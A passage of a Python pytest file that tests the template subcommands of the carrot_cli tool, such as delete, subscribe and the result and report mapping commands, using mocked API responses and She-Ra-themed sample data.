"Try 'carrot_cli template update --help' for help.\n"
"\n"
"Error: Missing argument 'ID'.",
},
]
)
def update_data(request):
# Set all requests to return None so only the one we expect will return a value
mockito.when(templates).update(...).thenReturn(None)
# Mock up request response only if we expect it to get that far
if len(request.param["params"]) > 0:
mockito.when(templates).update(
request.param["params"][0],
request.param["params"][1],
request.param["params"][2],
request.param["params"][3],
request.param["params"][4],
).thenReturn(request.param["return"])
return request.param
def test_update(update_data):
runner = CliRunner()
result = runner.invoke(carrot, update_data["args"])
assert result.output == update_data["return"] + "\n"
@pytest.fixture(
params=[
{
"args": ["template", "delete", "cd987859-06fe-4b1a-9e96-47d4f36bf819"],
"id": "cd987859-06fe-4b1a-9e96-47d4f36bf819",
"find_return": json.dumps(
{
"created_at": "2020-09-16T18:48:06.371563",
"created_by": "adora@example.com",
"description": "This template replaced the broken one",
"test_wdl": "example.com/she-ra_test.wdl",
"eval_wdl": "example.com/she-ra_eval.wdl",
"name": "New Sword of Protection template",
"pipeline_id": "4d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"template_id": "cd987859-06fe-4b1a-9e96-47d4f36bf819",
},
indent=4,
sort_keys=True,
),
"email": "adora@example.com",
"return": json.dumps(
{"message": "Successfully deleted 1 row"}, indent=4, sort_keys=True
),
},
{
"args": [
"template",
"delete",
"-y",
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
],
"id": "cd987859-06fe-4b1a-9e96-47d4f36bf819",
"find_return": json.dumps(
{
"created_at": "2020-09-16T18:48:06.371563",
"created_by": "adora@example.com",
"description": "This template replaced the broken one",
"test_wdl": "example.com/she-ra_test.wdl",
"eval_wdl": "example.com/she-ra_eval.wdl",
"name": "New Sword of Protection template",
"pipeline_id": "4d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"template_id": "cd987859-06fe-4b1a-9e96-47d4f36bf819",
},
indent=4,
sort_keys=True,
),
"email": "catra@example.com",
"return": json.dumps(
{"message": "Successfully deleted 1 row"}, indent=4, sort_keys=True
),
},
{
"args": ["template", "delete", "cd987859-06fe-4b1a-9e96-47d4f36bf819"],
"id": "cd987859-06fe-4b1a-9e96-47d4f36bf819",
"find_return": json.dumps(
{
"created_at": "2020-09-16T18:48:06.371563",
"created_by": "adora@example.com",
"description": "This template replaced the broken one",
"test_wdl": "example.com/she-ra_test.wdl",
"eval_wdl": "example.com/she-ra_eval.wdl",
"name": "New Sword of Protection template",
"pipeline_id": "4d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"template_id": "cd987859-06fe-4b1a-9e96-47d4f36bf819",
},
indent=4,
sort_keys=True,
),
"email": "catra@example.com",
"return": json.dumps(
{"message": "Successfully deleted 1 row"}, indent=4, sort_keys=True
),
"interactive": {
"input": "y",
"message": "Template with id cd987859-06fe-4b1a-9e96-47d4f36bf819 was created by adora@example.com. "
"Are you sure you want to delete? [y/N]: y\n",
},
},
{
"args": ["template", "delete", "cd987859-06fe-4b1a-9e96-47d4f36bf819"],
"id": "cd987859-06fe-4b1a-9e96-47d4f36bf819",
"find_return": json.dumps(
{
"created_at": "2020-09-16T18:48:06.371563",
"created_by": "adora@example.com",
"description": "This template replaced the broken one",
"test_wdl": "example.com/she-ra_test.wdl",
"eval_wdl": "example.com/she-ra_eval.wdl",
"name": "New Sword of Protection template",
"pipeline_id": "4d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"template_id": "cd987859-06fe-4b1a-9e96-47d4f36bf819",
},
indent=4,
sort_keys=True,
),
"email": "catra@example.com",
"return": "",
"interactive": {
"input": "n",
"message": "Template with id cd987859-06fe-4b1a-9e96-47d4f36bf819 was created by adora@example.com. "
"Are you sure you want to delete? [y/N]: n",
},
"logging": "Okay, aborting delete operation",
},
{
"args": ["template", "delete", "cd987859-06fe-4b1a-9e96-47d4f36bf819"],
"id": "cd987859-06fe-4b1a-9e96-47d4f36bf819",
"find_return": json.dumps(
{
"title": "No template found",
"status": 404,
"detail": "No template found with the specified ID",
},
indent=4,
sort_keys=True,
),
"email": "adora@example.com",
"return": json.dumps(
{
"title": "No template found",
"status": 404,
"detail": "No template found with the specified ID",
},
indent=4,
sort_keys=True,
),
},
]
)
def delete_data(request):
# We want to load the value from "email" from config
mockito.when(config).load_var("email").thenReturn(request.param["email"])
# Set all requests to return None so only the one we expect will return a value
mockito.when(templates).delete(...).thenReturn(None)
mockito.when(templates).find_by_id(...).thenReturn(None)
# Mock up request response
mockito.when(templates).delete(request.param["id"]).thenReturn(
request.param["return"]
)
mockito.when(templates).find_by_id(request.param["id"]).thenReturn(
request.param["find_return"]
)
return request.param
def test_delete(delete_data, caplog):
caplog.set_level(logging.INFO)
runner = CliRunner()
# Include interactive input and expected message if this test should trigger interactive stuff
if "interactive" in delete_data:
expected_output = (
delete_data["interactive"]["message"] + delete_data["return"] + "\n"
)
result = runner.invoke(
carrot, delete_data["args"], input=delete_data["interactive"]["input"]
)
assert result.output == expected_output
else:
result = runner.invoke(carrot, delete_data["args"])
assert result.output == delete_data["return"] + "\n"
# If we expect logging that we want to check, make sure it's there
if "logging" in delete_data:
assert delete_data["logging"] in caplog.text
@pytest.fixture(
params=[
{
"args": [
"template",
"find_runs",
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"--name",
"Queen of Bright Moon run",
"--status",
"succeeded",
"--test_input",
"tests/data/mock_test_input.json",
"--eval_input",
"tests/data/mock_eval_input.json",
"--test_cromwell_job_id",
"d9855002-6b71-429c-a4de-8e90222488cd",
"--eval_cromwell_job_id",
"03958293-6b71-429c-a4de-8e90222488cd",
"--created_before",
"2020-10-00T00:00:00.000000",
"--created_after",
"2020-09-00T00:00:00.000000",
"--created_by",
"glimmer@example.com",
"--finished_before",
"2020-10-00T00:00:00.000000",
"--finished_after",
"2020-09-00T00:00:00.000000",
"--sort",
"asc(name)",
"--limit",
1,
"--offset",
0,
],
"params": [
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"Queen of Bright Moon run",
"succeeded",
{"in_greeted": "Cool Person"},
{"in_output_filename": "test_greeting.txt"},
"d9855002-6b71-429c-a4de-8e90222488cd",
"03958293-6b71-429c-a4de-8e90222488cd",
"2020-10-00T00:00:00.000000",
"2020-09-00T00:00:00.000000",
"glimmer@example.com",
"2020-10-00T00:00:00.000000",
"2020-09-00T00:00:00.000000",
"asc(name)",
1,
0,
],
"return": json.dumps(
[
{
"created_at": "2020-09-16T18:48:06.371563",
"finished_at": "2020-09-16T18:58:06.371563",
"created_by": "glimmer@example.com",
"test_input": {"in_mother": "Angella"},
"eval_input": {"in_friend": "Bow"},
"status": "succeeded",
"results": {},
"test_cromwell_job_id": "d9855002-6b71-429c-a4de-8e90222488cd",
"eval_cromwell_job_id": "03958293-6b71-429c-a4de-8e90222488cd",
"name": "Queen of Bright Moon run",
"test_id": "3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"run_id": "cd987859-06fe-4b1a-9e96-47d4f36bf819",
}
],
indent=4,
sort_keys=True,
),
},
{
"args": ["template", "find_runs", "986325ba-06fe-4b1a-9e96-47d4f36bf819"],
"params": [
"986325ba-06fe-4b1a-9e96-47d4f36bf819",
"",
"",
"",
"",
"",
"",
"",
"",
"",
"",
"",
"",
20,
0,
],
"return": json.dumps(
{
"title": "No run found",
"status": 404,
"detail": "No runs found with the specified parameters",
},
indent=4,
sort_keys=True,
),
},
{
"args": [
"template",
"find_runs",
"986325ba-06fe-4b1a-9e96-47d4f36bf819",
"--test_input",
"nonexistent_file.json",
],
"params": [],
"logging": "Encountered FileNotFound error when trying to read nonexistent_file.json",
},
]
)
def find_runs_data(request):
# Set all requests to return None so only the one we expect will return a value
mockito.when(runs).find(...).thenReturn(None)
# Mock up request response
if len(request.param["params"]) > 0:
mockito.when(runs).find(
"templates",
request.param["params"][0],
request.param["params"][1],
request.param["params"][2],
request.param["params"][3],
request.param["params"][4],
request.param["params"][5],
request.param["params"][6],
request.param["params"][7],
request.param["params"][8],
request.param["params"][9],
request.param["params"][10],
request.param["params"][11],
request.param["params"][12],
request.param["params"][13],
request.param["params"][14],
).thenReturn(request.param["return"])
return request.param
def test_find_runs(find_runs_data, caplog):
runner = CliRunner()
result = runner.invoke(carrot, find_runs_data["args"])
if "logging" in find_runs_data:
assert find_runs_data["logging"] in caplog.text
else:
assert result.output == find_runs_data["return"] + "\n"
@pytest.fixture(
params=[
{
"args": [
"template",
"subscribe",
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"--email",
"netossa@example.com",
],
"params": ["cd987859-06fe-4b1a-9e96-47d4f36bf819", "netossa@example.com"],
"return": json.dumps(
{
"subscription_id": "361b3b95-4a6e-40d9-bd98-f92b2959864e",
"entity_type": "template",
"entity_id": "cd987859-06fe-4b1a-9e96-47d4f36bf819",
"email": "netossa@example.com",
"created_at": "2020-09-23T19:41:46.839880",
},
indent=4,
sort_keys=True,
),
},
{
"args": [
"template",
"subscribe",
"89657859-06fe-4b1a-9e96-47d4f36bf819",
"--email",
"spinnerella@example.com",
],
"params": [
"89657859-06fe-4b1a-9e96-47d4f36bf819",
"spinnerella@example.com",
],
"return": json.dumps(
{
"title": "No template found",
"status": 404,
"detail": "No template found with the specified ID",
},
indent=4,
sort_keys=True,
),
},
{
"args": ["template", "subscribe", "89657859-06fe-4b1a-9e96-47d4f36bf819"],
"params": ["89657859-06fe-4b1a-9e96-47d4f36bf819", "frosta@example.com"],
"return": json.dumps(
{
"subscription_id": "361b3b95-4a6e-40d9-bd98-f92b2959864e",
"entity_type": "template",
"entity_id": "cd987859-06fe-4b1a-9e96-47d4f36bf819",
"email": "frosta@example.com",
"created_at": "2020-09-23T19:41:46.839880",
},
indent=4,
sort_keys=True,
),
},
]
)
def subscribe_data(request):
# Set all requests to return None so only the one we expect will return a value
mockito.when(templates).subscribe(...).thenReturn(None)
mockito.when(config).load_var_no_error("email").thenReturn("frosta@example.com")
# Mock up request response
mockito.when(templates).subscribe(
request.param["params"][0], request.param["params"][1]
).thenReturn(request.param["return"])
return request.param
def test_subscribe(subscribe_data):
runner = CliRunner()
result = runner.invoke(carrot, subscribe_data["args"])
assert result.output == subscribe_data["return"] + "\n"
@pytest.fixture(
params=[
{
"args": [
"template",
"unsubscribe",
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"--email",
"netossa@example.com",
],
"params": ["cd987859-06fe-4b1a-9e96-47d4f36bf819", "netossa@example.com"],
"return": json.dumps(
{"message": "Successfully deleted 1 row(s)"}, indent=4, sort_keys=True
),
},
{
"args": [
"template",
"unsubscribe",
"89657859-06fe-4b1a-9e96-47d4f36bf819",
"--email",
"spinnerella@example.com",
],
"params": [
"89657859-06fe-4b1a-9e96-47d4f36bf819",
"spinnerella@example.com",
],
"return": json.dumps(
{
"title": "No subscription found",
"status": 404,
"detail": "No subscription found for the specified parameters",
},
indent=4,
sort_keys=True,
),
},
{
"args": ["template", "unsubscribe", "89657859-06fe-4b1a-9e96-47d4f36bf819"],
"params": ["89657859-06fe-4b1a-9e96-47d4f36bf819", "frosta@example.com"],
"return": json.dumps(
{"message": "Successfully deleted 1 row(s)"}, indent=4, sort_keys=True
),
},
]
)
def unsubscribe_data(request):
# Set all requests to return None so only the one we expect will return a value
mockito.when(templates).unsubscribe(...).thenReturn(None)
mockito.when(config).load_var_no_error("email").thenReturn("frosta@example.com")
# Mock up request response
mockito.when(templates).unsubscribe(
request.param["params"][0], request.param["params"][1]
).thenReturn(request.param["return"])
return request.param
def test_unsubscribe(unsubscribe_data):
runner = CliRunner()
result = runner.invoke(carrot, unsubscribe_data["args"])
assert result.output == unsubscribe_data["return"] + "\n"
@pytest.fixture(
params=[
{
"args": [
"template",
"map_to_result",
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"out_horde_tanks",
"--created_by",
"adora@example.com",
],
"params": [
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"out_horde_tanks",
"adora@example.com",
],
"return": json.dumps(
{
"template_id": "cd987859-06fe-4b1a-9e96-47d4f36bf819",
"result_id": "3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"result_key": "out_horde_tanks",
"created_at": "2020-09-24T19:07:59.311462",
"created_by": "rogelio@example.com",
},
indent=4,
sort_keys=True,
),
},
{
"args": [
"template",
"map_to_result",
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"out_horde_tanks",
],
"params": [],
"logging": "No email config variable set. If a value is not specified for --created by, "
"there must be a value set for email.",
},
{
"args": ["template", "map_to_result"],
"params": [],
"return": "Usage: carrot_cli template map_to_result [OPTIONS] ID RESULT_ID RESULT_KEY\n"
"Try 'carrot_cli template map_to_result --help' for help.\n"
"\n"
"Error: Missing argument 'ID'.",
},
]
)
def map_to_result_data(request):
# Set all requests to return None so only the one we expect will return a value
mockito.when(template_results).create_map(...).thenReturn(None)
# Mock up request response only if we expect it to get that far
if len(request.param["params"]) > 0:
mockito.when(template_results).create_map(
request.param["params"][0],
request.param["params"][1],
request.param["params"][2],
request.param["params"][3],
).thenReturn(request.param["return"])
return request.param
def test_map_to_result(map_to_result_data, caplog):
runner = CliRunner()
result = runner.invoke(carrot, map_to_result_data["args"])
if "logging" in map_to_result_data:
assert map_to_result_data["logging"] in caplog.text
else:
assert result.output == map_to_result_data["return"] + "\n"
@pytest.fixture(
params=[
{
"args": [
"template",
"find_result_map_by_id",
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
],
"params": [
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
],
"return": json.dumps(
{
"template_id": "cd987859-06fe-4b1a-9e96-47d4f36bf819",
"result_id": "3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"result_key": "out_horde_tanks",
"created_at": "2020-09-24T19:07:59.311462",
"created_by": "rogelio@example.com",
},
indent=4,
sort_keys=True,
),
},
{
"args": ["template", "find_result_map_by_id"],
"params": [],
"return": "Usage: carrot_cli template find_result_map_by_id [OPTIONS] ID RESULT_ID\n"
"Try 'carrot_cli template find_result_map_by_id --help' for help.\n"
"\n"
"Error: Missing argument 'ID'.",
},
]
)
def find_result_map_by_id_data(request):
# Set all requests to return None so only the one we expect will return a value
mockito.when(template_results).find_map_by_ids(...).thenReturn(None)
# Mock up request response only if we expect it to get that far
if len(request.param["params"]) > 0:
mockito.when(template_results).find_map_by_ids(
request.param["params"][0],
request.param["params"][1],
).thenReturn(request.param["return"])
return request.param
def test_find_result_map_by_id(find_result_map_by_id_data):
runner = CliRunner()
result = runner.invoke(carrot, find_result_map_by_id_data["args"])
assert result.output == find_result_map_by_id_data["return"] + "\n"
@pytest.fixture(
params=[
{
"args": [
"template",
"find_result_maps",
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"--result_id",
"4d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"--result_key",
"sword_of_protection_key",
"--created_by",
"adora@example.com",
"--created_before",
"2020-10-00T00:00:00.000000",
"--created_after",
"2020-09-00T00:00:00.000000",
"--sort",
"asc(result_key)",
"--limit",
1,
"--offset",
0,
],
"params": [
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"4d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"sword_of_protection_key",
"2020-10-00T00:00:00.000000",
"2020-09-00T00:00:00.000000",
"adora@example.com",
"asc(result_key)",
1,
0,
],
"return": json.dumps(
[
{
"template_id": "cd987859-06fe-4b1a-9e96-47d4f36bf819",
"result_id": "4d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"result_key": "sword_of_protection_key",
"created_at": "2020-09-24T19:07:59.311462",
"created_by": "adora@example.com",
}
],
indent=4,
sort_keys=True,
),
},
{
"args": [
"template",
"find_result_maps",
"986325ba-06fe-4b1a-9e96-47d4f36bf819",
],
"params": [
"986325ba-06fe-4b1a-9e96-47d4f36bf819",
"",
"",
"",
"",
"",
"",
20,
0,
],
"return": json.dumps(
{
"title": "No template_results found",
"status": 404,
"detail": "No template_results found with the specified parameters",
},
indent=4,
sort_keys=True,
),
},
]
)
def find_result_maps_data(request):
# Set all requests to return None so only the one we expect will return a value
mockito.when(template_results).find_maps(...).thenReturn(None)
# Mock up request response
mockito.when(template_results).find_maps(
request.param["params"][0],
request.param["params"][1],
request.param["params"][2],
request.param["params"][3],
request.param["params"][4],
request.param["params"][5],
request.param["params"][6],
request.param["params"][7],
request.param["params"][8],
).thenReturn(request.param["return"])
return request.param
def test_find_result_maps(find_result_maps_data):
runner = CliRunner()
result = runner.invoke(carrot, find_result_maps_data["args"])
assert result.output == find_result_maps_data["return"] + "\n"
@pytest.fixture(
params=[
{
"args": [
"template",
"delete_result_map_by_id",
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
],
"ids": [
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
],
"find_return": json.dumps(
{
"template_id": "cd987859-06fe-4b1a-9e96-47d4f36bf819",
"result_id": "4d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"result_key": "sword_of_protection_key",
"created_at": "2020-09-24T19:07:59.311462",
"created_by": "adora@example.com",
},
indent=4,
sort_keys=True,
),
"email": "adora@example.com",
"return": json.dumps(
{"message": "Successfully deleted 1 row"}, indent=4, sort_keys=True
),
},
{
"args": [
"template",
"delete_result_map_by_id",
"-y",
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
],
"ids": [
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
],
"find_return": json.dumps(
{
"template_id": "cd987859-06fe-4b1a-9e96-47d4f36bf819",
"result_id": "4d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"result_key": "sword_of_protection_key",
"created_at": "2020-09-24T19:07:59.311462",
"created_by": "adora@example.com",
},
indent=4,
sort_keys=True,
),
"email": "catra@example.com",
"return": json.dumps(
{"message": "Successfully deleted 1 row"}, indent=4, sort_keys=True
),
},
{
"args": [
"template",
"delete_result_map_by_id",
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
],
"ids": [
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
],
"find_return": json.dumps(
{
"template_id": "cd987859-06fe-4b1a-9e96-47d4f36bf819",
"result_id": "4d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"result_key": "sword_of_protection_key",
"created_at": "2020-09-24T19:07:59.311462",
"created_by": "adora@example.com",
},
indent=4,
sort_keys=True,
),
"email": "catra@example.com",
"return": json.dumps(
{"message": "Successfully deleted 1 row"}, indent=4, sort_keys=True
),
"interactive": {
"input": "y",
"message": "Mapping for template with id cd987859-06fe-4b1a-9e96-47d4f36bf819 and "
"result with id 3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8 was created by adora@example.com. Are "
"you sure you want to delete? [y/N]: y\n",
},
},
{
"args": [
"template",
"delete_result_map_by_id",
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
],
"ids": [
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
],
"find_return": json.dumps(
{
"template_id": "cd987859-06fe-4b1a-9e96-47d4f36bf819",
"result_id": "4d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"result_key": "sword_of_protection_key",
"created_at": "2020-09-24T19:07:59.311462",
"created_by": "adora@example.com",
},
indent=4,
sort_keys=True,
),
"email": "catra@example.com",
"return": "",
"interactive": {
"input": "n",
"message": "Mapping for template with id cd987859-06fe-4b1a-9e96-47d4f36bf819 and "
"result with id 3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8 was created by adora@example.com. Are "
"you sure you want to delete? [y/N]: n",
},
"logging": "Okay, aborting delete operation",
},
{
"args": [
"template",
"delete_result_map_by_id",
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
],
"ids": [
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
],
"find_return": json.dumps(
{
"title": "No template_result found",
"status": 404,
"detail": "No template_result found with the specified ID",
},
indent=4,
sort_keys=True,
),
"email": "adora@example.com",
"return": json.dumps(
{
"title": "No template_result found",
"status": 404,
"detail": "No template_result found with the specified ID",
},
indent=4,
sort_keys=True,
),
},
{
"args": ["template", "delete_result_map_by_id"],
"ids": [],
"email": "adora@example.com",
"return": "Usage: carrot_cli template delete_result_map_by_id [OPTIONS] ID RESULT_ID\n"
"Try 'carrot_cli template delete_result_map_by_id --help' for help.\n"
"\n"
"Error: Missing argument 'ID'.",
},
]
)
def delete_result_map_by_id_data(request):
# We want to load the value from "email" from config
mockito.when(config).load_var("email").thenReturn(request.param["email"])
# Set all requests to return None so only the one we expect will return a value
mockito.when(template_results).delete_map_by_ids(...).thenReturn(None)
mockito.when(template_results).find_map_by_ids(...).thenReturn(None)
# Mock up request response only if we expect it to get that far
if len(request.param["ids"]) > 0:
mockito.when(template_results).delete_map_by_ids(
request.param["ids"][0],
request.param["ids"][1],
).thenReturn(request.param["return"])
mockito.when(template_results).find_map_by_ids(
request.param["ids"][0],
request.param["ids"][1],
).thenReturn(request.param["find_return"])
return request.param
def test_delete_result_map_by_id(delete_result_map_by_id_data, caplog):
caplog.set_level(logging.INFO)
runner = CliRunner()
# Include interactive input and expected message if this test should trigger interactive stuff
if "interactive" in delete_result_map_by_id_data:
expected_output = (
delete_result_map_by_id_data["interactive"]["message"]
+ delete_result_map_by_id_data["return"]
+ "\n"
)
result = runner.invoke(
carrot,
delete_result_map_by_id_data["args"],
input=delete_result_map_by_id_data["interactive"]["input"],
)
assert result.output == expected_output
else:
result = runner.invoke(carrot, delete_result_map_by_id_data["args"])
assert result.output == delete_result_map_by_id_data["return"] + "\n"
# If we expect logging that we want to check, make sure it's there
if "logging" in delete_result_map_by_id_data:
assert delete_result_map_by_id_data["logging"] in caplog.text
@pytest.fixture(
params=[
{
"args": [
"template",
"map_to_report",
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"--created_by",
"adora@example.com",
],
"params": [
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"adora@example.com",
],
"return": json.dumps(
{
"template_id": "cd987859-06fe-4b1a-9e96-47d4f36bf819",
"report_id": "3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"created_at": "2020-09-24T19:07:59.311462",
"created_by": "rogelio@example.com",
},
indent=4,
sort_keys=True,
),
},
{
"args": [
"template",
"map_to_report",
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
],
"params": [],
"logging": "No email config variable set. If a value is not specified for --created by, "
"there must be a value set for email.",
},
{
"args": ["template", "map_to_report"],
"params": [],
"return": "Usage: carrot_cli template map_to_report [OPTIONS] ID REPORT_ID\n"
"Try 'carrot_cli template map_to_report --help' for help.\n"
"\n"
"Error: Missing argument 'ID'.",
},
]
)
def map_to_report_data(request):
# Set all requests to return None so only the one we expect will return a value
mockito.when(template_reports).create_map(...).thenReturn(None)
# Mock up request response only if we expect it to get that far
if len(request.param["params"]) > 0:
mockito.when(template_reports).create_map(
request.param["params"][0],
request.param["params"][1],
request.param["params"][2],
).thenReturn(request.param["return"])
return request.param
def test_map_to_report(map_to_report_data, caplog):
runner = CliRunner()
result = runner.invoke(carrot, map_to_report_data["args"])
if "logging" in map_to_report_data:
assert map_to_report_data["logging"] in caplog.text
else:
assert result.output == map_to_report_data["return"] + "\n"
@pytest.fixture(
params=[
{
"args": [
"template",
"find_report_map_by_id",
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
],
"params": [
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
],
"return": json.dumps(
{
"template_id": "cd987859-06fe-4b1a-9e96-47d4f36bf819",
"report_id": "3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"input_map": {"section1": {"input1": "val1"}},
"created_at": "2020-09-24T19:07:59.311462",
"created_by": "rogelio@example.com",
},
indent=4,
sort_keys=True,
),
},
{
"args": ["template", "find_report_map_by_id"],
"params": [],
"return": "Usage: carrot_cli template find_report_map_by_id [OPTIONS] ID REPORT_ID\n"
"Try 'carrot_cli template find_report_map_by_id --help' for help.\n"
"\n"
"Error: Missing argument 'ID'.",
},
]
)
def find_report_map_by_id_data(request):
# Set all requests to return None so only the one we expect will return a value
mockito.when(template_reports).find_map_by_ids(...).thenReturn(None)
# Mock up request response only if we expect it to get that far
if len(request.param["params"]) > 0:
mockito.when(template_reports).find_map_by_ids(
request.param["params"][0],
request.param["params"][1],
).thenReturn(request.param["return"])
return request.param
def test_find_report_map_by_id(find_report_map_by_id_data):
runner = CliRunner()
result = runner.invoke(carrot, find_report_map_by_id_data["args"])
assert result.output == find_report_map_by_id_data["return"] + "\n"
@pytest.fixture(
params=[
{
"args": [
"template",
"find_report_maps",
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"--report_id",
"4d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"--created_by",
"adora@example.com",
"--created_before",
"2020-10-00T00:00:00.000000",
"--created_after",
"2020-09-00T00:00:00.000000",
"--sort",
"asc(input_map)",
"--limit",
1,
"--offset",
0,
],
"params": [
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"4d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"2020-10-00T00:00:00.000000",
"2020-09-00T00:00:00.000000",
"adora@example.com",
"asc(input_map)",
1,
0,
],
"return": json.dumps(
[
{
"template_id": "cd987859-06fe-4b1a-9e96-47d4f36bf819",
"report_id": "4d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"created_at": "2020-09-24T19:07:59.311462",
"created_by": "adora@example.com",
}
],
indent=4,
sort_keys=True,
),
},
{
"args": [
"template",
"find_report_maps",
"986325ba-06fe-4b1a-9e96-47d4f36bf819",
],
"params": [
"986325ba-06fe-4b1a-9e96-47d4f36bf819",
"",
"",
"",
"",
"",
20,
0,
],
"return": json.dumps(
{
"title": "No template_reports found",
"status": 404,
"detail": "No template_reports found with the specified parameters",
},
indent=4,
sort_keys=True,
),
},
]
)
def find_report_maps_data(request):
# Set all requests to return None so only the one we expect will return a value
mockito.when(template_reports).find_maps(...).thenReturn(None)
# Mock up request response
mockito.when(template_reports).find_maps(
request.param["params"][0],
request.param["params"][1],
request.param["params"][2],
request.param["params"][3],
request.param["params"][4],
request.param["params"][5],
request.param["params"][6],
request.param["params"][7],
).thenReturn(request.param["return"])
return request.param
def test_find_report_maps(find_report_maps_data):
runner = CliRunner()
result = runner.invoke(carrot, find_report_maps_data["args"])
assert result.output == find_report_maps_data["return"] + "\n"
@pytest.fixture(
params=[
{
"args": [
"template",
"delete_report_map_by_id",
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
],
"ids": [
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
],
"find_return": json.dumps(
{
"template_id": "cd987859-06fe-4b1a-9e96-47d4f36bf819",
"report_id": "3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"input_map": {"section1": {"input1": "val1"}},
"created_at": "2020-09-24T19:07:59.311462",
"created_by": "rogelio@example.com",
},
indent=4,
sort_keys=True,
),
"email": "rogelio@example.com",
"return": json.dumps(
{"message": "Successfully deleted 1 row"}, indent=4, sort_keys=True
),
},
{
"args": [
"template",
"delete_report_map_by_id",
"-y",
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
],
"ids": [
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
],
"find_return": json.dumps(
{
"template_id": "cd987859-06fe-4b1a-9e96-47d4f36bf819",
"report_id": "3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"input_map": {"section1": {"input1": "val1"}},
"created_at": "2020-09-24T19:07:59.311462",
"created_by": "rogelio@example.com",
},
indent=4,
sort_keys=True,
),
"email": "adora@example.com",
"return": json.dumps(
{"message": "Successfully deleted 1 row"}, indent=4, sort_keys=True
),
},
{
"args": [
"template",
"delete_report_map_by_id",
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
],
"ids": [
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
],
"find_return": json.dumps(
{
"template_id": "cd987859-06fe-4b1a-9e96-47d4f36bf819",
"report_id": "3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
